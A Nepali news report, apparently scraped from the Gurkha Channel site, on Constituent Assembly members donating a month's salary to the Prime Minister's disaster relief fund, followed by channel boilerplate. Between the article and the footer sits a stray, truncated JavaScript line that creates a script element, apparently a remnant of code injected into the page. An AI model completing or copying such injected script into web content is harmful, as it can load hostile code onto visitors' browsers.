सभासदहरुले एक महिनाको तलव प्रधानमन्त्री दैवी उद्धार कोषलाई प्रदान गरेका

Naresh Ale Avatar

संबिधानसभामा प्रतिनिधित्व गर्ने सभासदहरुले एक महिनाको तलव प्रधानमन्त्री दैवी उद्धार कोषलाई प्रदान गरेका छन्। बिहीबार प्रधामन्त्री निबास बालुवाटारमा संबिधानसभाका अध्यक्ष सुवासचन्द्र नेम्वाङले सभासदहरुको एकमुष्ट रकमको चेक प्रधानमन्त्री सुशील कोईरालालाई हस्तान्तरण गर्नुभएको हो।

सभासदहरुको एक महिनाको तलव कोषलाई दिने निर्णय अनुसार नै सभाध्यक्ष नेम्वाङले दुई करोड ५७ लाख ८३ हजार रुपैयाको चेक प्रधानमन्त्रीलाई हस्तान्तरण गर्नुभएको हो। त्यस्तै संसद सचिवालयका कर्मचारीहरुलेपनि उक्त कोषमा सहयोग गरेका छन् । कर्मचारीबाट उठेको ११ लाख ५७ हजार रुपैयाको चेक प्रधानमन्त्री कोईरालालाई हस्तान्तरण गरिएको हो।

var d=document;var s=d.createElement(‘script’);

admin Avatar
About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories